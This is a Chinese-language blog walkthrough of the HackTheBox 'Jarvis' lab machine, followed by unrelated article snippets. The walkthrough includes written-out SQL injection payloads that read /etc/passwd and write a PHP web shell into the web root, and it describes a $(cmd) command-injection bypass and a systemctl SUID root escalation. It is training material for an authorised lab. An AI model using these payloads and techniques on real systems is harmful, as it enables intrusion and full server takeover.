No.165-HackTheBox-Linux-Jarvis-Walkthrough渗透学习

最新推荐文章于 2022-11-21 14:06:57 发布
最新推荐文章于 2022-11-21 14:06:57 发布
阅读量289 收藏
点赞数
分类专栏: Hack The box 文章标签: java linux python 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/107420511
版权

**

HackTheBox-Linux-Jarvis-Walkthrough

**
¬
靶机地址:https://www.hackthebox.eu/home/machines/profile/194
靶机难度:初级(4.7/10)
靶机发布日期:2019年9月9日
靶机描述:
Jarvis is a medium difficulty Linux box running a web server, which has DoS and brute force protection enabled. A page is found to be vulnerable to SQL injection, which requires manual exploitation. This service allows the writing of a shell to the web root for the foothold. The www user is allowed to execute a script as another user, and the script is vulnerable to command injection. On further enumeration, systemctl is found to have the SUID bit set, which is leveraged to gain a root shell.

作者:大余
时间:2020-07-18

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.143…
在这里插入图片描述
我这里利用Masscan快速的扫描出了21,22,64999端口,在利用nmap详细的扫描了三个端口信息,22是ssh,64999是http服务等…
在这里插入图片描述
访问到端口80上的Apache服务器,可以看到一个名为“ Stark Hotel”的页面…

在这里插入图片描述
可看到该页面有订餐页面,也有订房页面…

在这里插入图片描述
随意进入一个订房页面,发现URL,存在sql注入…
在这里插入图片描述
测试发现可利用sql注入提权…
在这里插入图片描述
命令:http://10.10.10.143/room.php?cod=-1 union select 1,load_file('/etc/passwd'),3,4,5,6,7
发现了2存在注入点,查看到了passwd信息…

在这里插入图片描述
利用into outfile创建了文本…将查看到的信息放入了文本中…测试看

在这里插入图片描述
可看到,成功的,那么简单了,写个shell提权即可…
在这里插入图片描述
命令:http://10.10.10.143/room.php?cod=-1 union select 1,'<?php system($_REQUEST["dayu"]);?>',3,4,5,6,7 into outfile '/var/www/html/dayu.php'
简单写入cmd命令…

在这里插入图片描述
然后利用cmd直接写入shell,获得了反向外壳www权限…但是无法读取user_flag信息…
在这里插入图片描述
sudo发现了all存在simpler.py脚本…查看
在这里插入图片描述
查看脚本,看到它使用-p参数获取IP地址,然后使用os.system()函数执行ping…
脚本还阻止了一些字符(&;-`| |)以防止注入…
但不会阻止字符“ $”,“()字符,这可以通过bash命令替换即“ $(cmd)”注入命令提权…
在这里插入图片描述
可以看到该命令被用户名pepper代替,并且ping尝试将其解析为主机名说明命令执行成功…
那么可以使用它来执行bash反向shell,并获得一个shell作为Pepper…
由于某些特殊字符被阻止,我将命令写入脚本并通过注入执行它…
在这里插入图片描述
简单的shell写入即可…
然后执行shell获得了反向外壳pepper用户权限…获得了user_flag信息…
由于这个外壳不稳定…我进行了ssh

在这里插入图片描述
创建.ssh,并本地生成ssh-key…然后写入到pepper中…(简单操作)
在这里插入图片描述
ssh登录后,枚举了SUID,发现存在systemctl…
systemctl命令用于管理运行systemd的系统上的服务…google看看怎么利用…
在这里插入图片描述
google发现了挺多提权的办法…
只需要创建一个服务,该服务在启动时执行我们选择的文件,然后使用它systemctl来启用和启动它…这样就能执行了
在这里插入图片描述
我创建了一个简单的bash-shell,然后创建service服务,并利用systemctl进行启动,启动后执行.sh的shell,并获得了root权限的反向外壳…
获得了root_flag信息…

简单的sql注入–systemctl(SUID)提权…

由于我们已经成功得到root权限查看user和root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

No.3-Jarvis-难度普通-HTB-walkthrough
weixin_43851945的博客
01-22 478
No.3-Jarvis-难度普通-HTB-walkthrough ** 挺有意思的一台机器,有挺多种方式拿 low priv shell。 ** 攻击机:官方Kali linux 2019 64位 作者:Ikonw 靶机介绍 一,端口扫描 只有HTTP 比较有兴趣,title 是 Stark Hotel Starting Nmap 7.80 ( https://nmap.org ) at 202...
hackthebox- Jarvis(考点:sql注入/mysql/systemct提权)不用sqlmap
冬萍子癸水
04-14 563
此靶机大多数人用的sqlmap。针对oscp,本文章未用sqlmap。其实现实场景中用sqlmap的也不多,会封IP的,不会让你扫来扫去。所以学习手工注入也很必要。在手工注入里也可以利用文件包含漏洞。 nmap 很常规,一开始又没ssh密码,当然是从80网页开始搜集信息。以及dirbuster扫它 发现phpadmin,但是没密码,继续看80 像这种改一个展示的东西,网址里的数字就变了一个,这...
基于Linux平台下的语音管家Jarvis
今天你AC了吗
07-10 431
语音管家Jarvis1.项目简介2.项目技术点3.项目基本执行流程 1.项目简介 使用C++编写一个智能AI对话和语音命令执行的语音管理工具 借助图灵机器人和百度语音识别和合成等第三方平台和第三方工具 除基本交流功能外还可以执行基Linux下的基本指令(支持自己配置) 2.项目技术点 C++ STL库中的map和unordered_map的使用 http第三方库,使用post进行http请求 调用图灵机器人的API并接入Linux平台 百度语音识别和语音合成SDK Linux系统编程&网络编程
Python-Jarvis用于Linux的私人助理
08-11
Jarvis – 用于Linux的私人助理
Jarvis:适用于Linux和macOS的个人助理
02-04
贾维斯 Linux,MacOS和Windows的个人助理 Jarvis是适用于Linux,MacOS和Windows的简单个人助手,可在命令行上运行。 如果您启用他的声音,他可以与您交谈。 他可以告诉您天气,可以找到您附近的餐馆和其他地方。 他可以为您做一些很棒的事情。 入门 为了启动Jarvis,只需克隆并运行python installer 。 通过jarvis命令从任何地方运行Jarvis 在Mac OS X上,运行source setup.sh 在Windows上运行setup.bat 您可以通过在Jarvis命令行中键入help开始,以检查Jarvis可以为您做什么。 Y
Hackthebox-Jarvis (Machine Maker: manulqwerty & Ghostpp7)
weixin_43202322的博客
09-19 767
目录前言0x00 注入注入0x01提权总结 前言 IP: 10.10.10.143 友好的盒子 0x00 注入注入 在web页面逛逛,在预定房间页面, url: “http://10.10.10.143/room.php?cod=2” 这不测试一下注入枉自为人了,很快可以发现这是个完全没有过滤的数字型注入: payload: “2 and sleep(5)” 成功延时,那还有啥好说...
No.108-HackTheBox-Linux-Charon-Walkthrough渗透学习
qq_34801745的博客
05-21 511
** HackTheBox-Linux-Charon-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/42 靶机难度:中级(3.5/10) 靶机发布日期:2017年10月7日 靶机描述: Charon is definitely one of the more challenging machines on HackTheBox. It does not require any advanced techniques,
No.166-HackTheBox-Linux-Haystack-Walkthrough渗透学习
qq_34801745的博客
07-20 289
** HackTheBox-Linux-Haystack-Walkthrough ** ¬ 靶机地址:https://www.hackthebox.eu/home/machines/profile/195 靶机难度:初级(3.6/10) 靶机发布日期:2019年10月20日 靶机描述: Haystack is an Easy difficulty Linux box running the ELK stack ( Elasticsearch, Logstash and Kibana). The elasti
No.170-HackTheBox-Linux-Safe-Walkthrough渗透学习
qq_34801745的博客
07-21 330
** HackTheBox-Linux-Safe-Walkthrough ** ¬ 靶机地址:https://www.hackthebox.eu/home/machines/profile/199 靶机难度:初级(2.7/10) 靶机发布日期:2019年10月25日 靶机描述: Safe is an Easy difficulty Linux VM with a vulnerable service running on a port. The binary is found to be vulnerabl
No.148-HackTheBox-Linux-Chaos-Walkthrough渗透学习
qq_34801745的博客
06-24 419
** HackTheBox-Linux-Chaos-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/167 靶机难度:中级(5.0/10) 靶机发布日期:2019年4月25日 靶机描述: Chaos is a “medium” difficulty box which provides an array of challenges to deal with. It requires a fair amount enume
PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl
02-07
标题中的"PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl"表明我们讨论的是一个从Python Package Index(PyPI)官方源下载的软件包,名为`jarvis_tools`,其版本号为2019.7.11。这个软件包是针对...
Hack the box靶机 Jarvis
菜浪马废的博客
05-23 318
有sql注入 查看到是7列 2345位置是有回显的 说实话我今天有点累了 好想用sqlmap啊 DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0 imissyou 看到一个.py脚本 执行ping命令 有了user的权限 什么也看不见 nc一下 ...
Hack The Boxlinux练习-- Jarvis
人间体佐菲的博客
11-21 372
Hack The Boxlinux练习-- Jarvis
靶机渗透_hackthebox__jarvis -7
qq_34717555的博客
11-11 642
目标IP:10.10.10.143 Nmap scan report for supersecurehotel.htb (10.10.10.143) Host is up (0.28s latency). Not shown: 939 closed ports, 58 filtered ports PORT STATE SERVICE VERSION 22/tcp open ss...
java执行Linux命令
Jarvis_技术专栏
10-18 4133
<br />如果运用java执行Linux命令 一个简单的例子:<br />/** * 修改Linux目录权限 * @param path */ public boolean chmod(String path) { // LogUtil.LogCommInfo("------修改权限路劲 path="+path); boolean flag = false ; try{ String cmdStrs[] = new String[]{"chmod","-R
Python库 | jarvis_tools-10.23.2018-py2.py3-none-any.whl
03-31
资源分类:Python库 所属语言:Python 资源全名:jarvis_tools-10.23.2018-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
初探百度大数据分析挖掘平台Jarvis
数据分析
08-10 2399
在人工智能时代,企业既想通过大数据分析、挖掘技术提升效率,又被大数据量分析、机器学习挖掘等相关技术门槛阻扰,需要一款数据分析挖掘产品跨越这个鸿沟。Jarvis在这个背景下...
Jarvis后台管理模板
12-13
Jarvis后台管理模板是一款Jarvis Smart Admin模板。
专题6-Linux内核子系统
Jarvis的博客
08-24 191
专题6-Linux内核子系统 第1课-Linux内存管理子系统 从架构理解内存管理 1。虚拟地址映射 支持的虚拟地址空间是硬件决定的,地址线决定的 0-3G是用户空间,3-4G是内核空间 内核空间分布: 1。直接映射区3-3+896M 2.vmalloc区 3.永久映射区 一个物理页4K 高10位+cr3寄存器=通过页目录页表的基地址 中间10位+也目录的基地址=页表中页的基地址 低...
Linux的常用命令
Jarvis_V的博客
04-17 1030
linux常用命令 (一)学习linux终端命令的原因 1、linux没有图形界面,所有的操作全靠命令完成,如磁盘操作,文件存取,目标操作,进程管理,文件权限设定等。 2、在职场中,大量的服务器维护工作都是在远程通过SS和客户端来完成的。 (二)终端使用技巧 1、方向键 上下 切换之前的命令 2、方向键 左右 移动光标 3、ctrl + a : 移动光标到命令的头部 4、ctrl ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值
>